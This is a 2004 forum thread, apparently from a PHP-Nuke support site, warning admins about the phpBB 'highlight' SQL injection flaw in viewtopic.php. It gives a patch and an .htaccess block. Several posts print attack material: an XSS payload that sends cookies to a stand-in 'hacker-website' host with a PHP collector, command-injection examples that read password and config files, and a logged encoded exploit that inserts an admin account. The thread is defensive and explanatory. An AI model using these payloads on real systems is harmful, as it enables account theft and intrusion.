ALL USERS URGENT UPDATE! - phpBB Exploit Discovered

Posted: Fri Nov 19, 2004 6:22 pm

Hi Folks

Just as a heads-up until Chatserv comes out with a new permanent update with a new port to phpBB 2.0.11, please be aware of the following.

There is a serious security exploit regarding the "highlight" function in phpBB.

Last month, I filled out a bug report and that got followed up by several other users also filling in other problems relative to the highlight function after I first discovering several problems here and at [ Only registered users can see links on this board! Get registered or login! ]

See: [ Only registered users can see links on this board! Get registered or login! ]

As it turns out, one of those "other" problems was also a serious security exploit... While I won't go into the nasty situation that happened after that, (which is what got the folks over at phpBB to get off their butts and fix it).....I will say:

All users are URGED to IMMEDIATELY see the following report from phpBB and make the change!
[ Only registered users can see links on this board! Get registered or login! ]

The affected file is /modules/Forums/viewtopic.php

Just a heads-up!

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

Thanks so much for this alert! If you were one of my customers I would reward you hostwise, but alas, I can't.

Posted: Fri Nov 19, 2004 8:36 pm

Can someone enlighten me as to why urldecode() being removed is a patch for this problem?

Posted: Fri Nov 19, 2004 8:37 pm

I asked 64bit also but haven't heard back.

Posted: Fri Nov 19, 2004 8:40 pm

Is it just me or do the links in your email notification no longer work?

Typical windblows. Reboot and all is well.

Posted: Fri Nov 19, 2004 8:53 pm

Mine are working, but since updating to Firefox 1.0, they don't open in a new window but rather the one I'm working it... Which really slowed down the PM I just sent you...

lol

I'm off to find a solution for that now.

Anyway.. RE this problem. It should be noted that some are telling me that this is not a fix to the problems, but rather a patch to protect users. The fix is being worked on and will be released as part of 2.0.12.

I've given what little information remains about this incident to Raven. Most of the forum posts at phpBB regarding this issue have been deleted by the staff.

Anyway... I'll be back after StarGate. (What can I say, Priorities). Smile

Client Joined: Jan 29, 2004 Posts: 624

Frankly I see little difference between the break and the fix

Code:




Open viewtopic.php in any text editor. Find the following section of code: 


Code: 





// 


// Was a highlight request part of the URI? 


// 


$highlight_match = $highlight = ''; 


if (isset($HTTP_GET_VARS['highlight'])) 


{ 


   // Split words and phrases 


   $words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight'])))); 





   for($i = 0; $i < sizeof($words); $i++) 


   { 


 





and replace with: 


Code: 





// 


// Was a highlight request part of the URI? 


// 


$highlight_match = $highlight = ''; 


if (isset($HTTP_GET_VARS['highlight'])) 


{ 


   // Split words and phrases 


   $words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight']))); 





   for($i = 0; $i < sizeof($words); $i++) 


   { 


 





Please inform as many people as possible about this issue. If you're a hosting provider please inform your customers if possible. Else we advise you implement some level of additional security if you run ensim or have PHP running cgi under suexec, etc.

except for the urldecode thing and number of )s reduced from 4 to 3. What possible significance could that have in terms of security?

Worker Joined: Aug 06, 2004 Posts: 192

[ Only registered users can see links on this board! Get registered or login! ]

That link has a little better explanation.

Posted: Sat Nov 20, 2004 2:12 pm

I did not include that link as it doesn't really explain the problem, but rather some of the hostilities that took place after it.

In fact this thread is pretty hostile itself (though it doesn't hold a candle to the other ones). As I said in my original post, there was a rather nasty situation that occurred following identification of the problems. Those threads have been deleted by phpbb admin personnel. I suspect this one will be as well.

All in all, things are pretty sensitive over at phpbb.com right now. I would suggest that users stay as far removed from this situation as possible to avoid any backlash (or tonguelashings) that has been experienced by others.

I've found even asking specific questions about the exploit have been greeted by .... what I would define as "a defensive posture" on the part of phpbb folks, so again, I wouldn't post anything unless you are ready to deal with that. I would especially advise that nobody post anything else to the above listed thread as again, some people seem to be still reeling from how this situation arose and was dealt with.

Just my two cents.

As a heads-up, my host got hacked via this exploit about 6 hours after I posted a notice on their site. I guess they didn't think it was as important as I advised. Oh well..... Some people never listen.

Posted: Sat Nov 20, 2004 2:18 pm

I have learned, as a general rule, if someone tells me to do this or that because they have first hand knowledge, I usually will do it, especially in matters of security. In this case I still don't understand the exploit and even less how that change stops it. But, better safe than sorry, that's for sure. Thanks once again.

Posted: Sat Nov 20, 2004 2:38 pm

Funny stuff there! PHPBB is almost as bad as FB when it comes to their reputation with handling reported issues. I don't condone the lamer tactics used to secure credit for finding the bug but it was really not much to ask for IMO. Its not like they tried to extort money for pete's sake.

Posted: Sat Nov 20, 2004 3:11 pm

There are actually several bugs that are related to injection vulnerabilities... This one is the easiest, and thus this is why this warning is urgent.

Here's the breakdown.... I'm being careful not to say too much because this hole exists in many places, and I don't want the script kiddies to feel like they are being invited to attack anyone.

The bottom line is that "urldecode" (and magic quotes) changes %2527 into %27 (a single quote) and leaves the converted data unslashed.

In a nutshell, this function being where it is, is creating a SQL Injection vulnerability via that function.

In this case, the function is useless where it is, so it was removed as all it is doing is creating this hole in the code.

The preg_replace('#\b(')\b#i', '\1' function cannot do it's thing because by highlighting any topic with %2527, you are leaving the hole open with a single quote (%27).

Removing the decode makes it so that this function doesn't covert the highlighted variable and leaves it unaltered so that injection can't occur as it would be caught by line 1183 and generate an error.

Now, as an example, let's say that the %2527 query was followed by UNION, adminusername, adminpassword, xxx. This is where the real problem lies. You've basically bypassed all of the security in place by injecting a new query using highlight. Not a good thing.

It gets worse when you think about using viewtopic.php for XSS query.

For example, first lets say that they want your cookie.
[ Only registered users can see links on this board! Get registered or login! ]
Here, you could steal cookies by using:
<script>document.location='http://hacker-website/cookies.php?'+document.cookie</script>
and in [ Only registered users can see links on this board! Get registered or login! ]

On that site, they would have a PHP file with something like:
mail("me at wherever dot com","cookies from phpbb",$http_cookie);
echo $http_cookie; //or you can send it with a variable name

Needless to say, these are problems. Some of this comes back to: [ Only registered users can see links on this board! Get registered or login! ]

Anyway... What I found interesting (and god, don't ask me how since all of that data got dumped when I upgrade NukeSentinel to 2.1.1) was the first time I set this up as a test bed, NukeSentinel caught the UNION injection attempted. It did not pickup on the XSS exploit (I suspect because of how it is being done).

Anyway. I hope this helps explain what is going on.

P.S. If I'm saying too much, Raven.. please feel free to edit or destroy this message.

Thanks

Posted: Sun Nov 21, 2004 9:15 am

Thanks Steph I assumed it was something being passed encoded I didn't know the issue with urldecode was because of how it decoded the quotes. I run a hacked version of the scripting filters I but I haven't been able to pass code with either <scr+pt or <scr+pt even through the default ones.

New Member Joined: Dec 05, 2004 Posts: 1

64bitguy wrote:

There are actually several bugs that are related to injection vulnerabilities... This one is the easiest, and thus this is why this warning is urgent.

Here's the breakdown.... I'm being careful not to say too much because this hole exists in many places, and I don't want the script kiddies to feel like they are being invited to attack anyone.

The bottom line is that "urldecode" (and magic quotes) changes %2527 into %27 (a single quote) and leaves the converted data unslashed.

In a nutshell, this function being where it is, is creating a SQL Injection vulnerability via that function.

In this case, the function is useless where it is, so it was removed as all it is doing is creating this hole in the code.

The preg_replace('#\b(')\b#i', '\1' function cannot do it's thing because by highlighting any topic with %2527, you are leaving the hole open with a single quote (%27).

Removing the decode makes it so that this function doesn't covert the highlighted variable and leaves it unaltered so that injection can't occur as it would be caught by line 1183 and generate an error.

Now, as an example, let's say that the %2527 query was followed by UNION, adminusername, adminpassword, xxx. This is where the real problem lies. You've basically bypassed all of the security in place by injecting a new query using highlight. Not a good thing.

It gets worse when you think about using viewtopic.php for XSS query.

For example, first lets say that they want your cookie.
[ Only registered users can see links on this board! Get registered or login! ]
Here, you could steal cookies by using:
<script>document.location='http://hacker-website/cookies.php?'+document.cookie</script>
and in [ Only registered users can see links on this board! Get registered or login! ]

On that site, they would have a PHP file with something like:
mail("me at wherever dot com","cookies from phpbb",$http_cookie);
echo $http_cookie; //or you can send it with a variable name

you are joking right?
XSS is the very least of the problems with this exploit!
why would anyone even bother with a XSS attempt when the true
danger of this exploit lies in the fact that the unescaped %2527 chr
results in injecting a system $cmd.
I.E 'cat ../.passwd' on a shared host
or how about 'cat config.php'
now that is the REAL danger !

so if anyone is running a version < 2.0.11
update without a delay!

admins should aslo disable viewtopic.php if not updated.

c-ya

Quote:

Needless to say, these are problems. Some of this comes back to: [ Only registered users can see links on this board! Get registered or login! ]

Anyway... What I found interesting (and god, don't ask me how since all of that data got dumped when I upgrade NukeSentinel to 2.1.1) was the first time I set this up as a test bed, NukeSentinel caught the UNION injection attempted. It did not pickup on the XSS exploit (I suspect because of how it is being done).

Anyway. I hope this helps explain what is going on.

P.S. If I'm saying too much, Raven.. please feel free to edit or destroy this message.

Thanks

[/b]

Client Joined: Sep 18, 2004 Posts: 62

Is this the same as the PHPBB Santy Worm Exploit?

New Member Joined: Dec 18, 2004 Posts: 5

hi everyone, this is probably pretty basic...
I am seeing variations of this entry in my logs:
GET /viewtopic.php t=1144&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)......

After doing a little searching i found this was a sql injection attempt.
I have recently upgraded to the latest version of PHP 4x.

How can i block this type of stuff with Sentinel??

Thnaks in advance!!

Posted: Wed Dec 22, 2004 9:36 am

The entire string resolves to

INSERT INTO phpbb_users(user_id,user_active,username,user_password,user_level) VALUES ('99999','1','lock','ba3c83348bddf7b368b478ac06d3340e','1')

We're looking into it and will report back.

Posted: Wed Dec 22, 2004 11:03 am

sixonetonoffun wrote:

Funny stuff there! PHPBB is almost as bad as FB when it comes to their reputation with handling reported issues. I don't condone the lamer tactics used to secure credit for finding the bug but it was really not much to ask for IMO. Its not like they tried to extort money for pete's sake.

I'd go as far as saying it is worse, much lile PostNuke they don't like using code implemented by non members

Posted: Wed Dec 22, 2004 11:21 am

This was also offered up on the phpBB site as a band-aid until an upgrade of the forum software can be made.

Add this to your .htaccess:

Code:

RewriteEngine on





RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 


RewriteRule ^.*$ - [F,L]

Posted: Wed Dec 22, 2004 1:56 pm

Believe it or not NukeSentinel(tm) already blocks that attempt as a "Script" attack. I'm getting 10 to 15 of them a day on my site and they are getting blocked Smile

Posted: Wed Dec 22, 2004 2:13 pm

I thought is was but I wanted it confirmed Wink

Posted: Wed Dec 22, 2004 2:21 pm

BobMarion wrote:

Believe it or not NukeSentinel(tm) already blocks that attempt as a "Script" attack. I'm getting 10 to 15 of them a day on my site and they are getting blocked Smile

might be a good idea to expand the filter check to work with the Forums and their related modules.

Client Joined: Apr 10, 2004 Posts: 649 Location: UK

Has this been implemented in Chat's latest patched series please?

Posted: Tue Dec 28, 2004 11:05 am

The patch already had the script block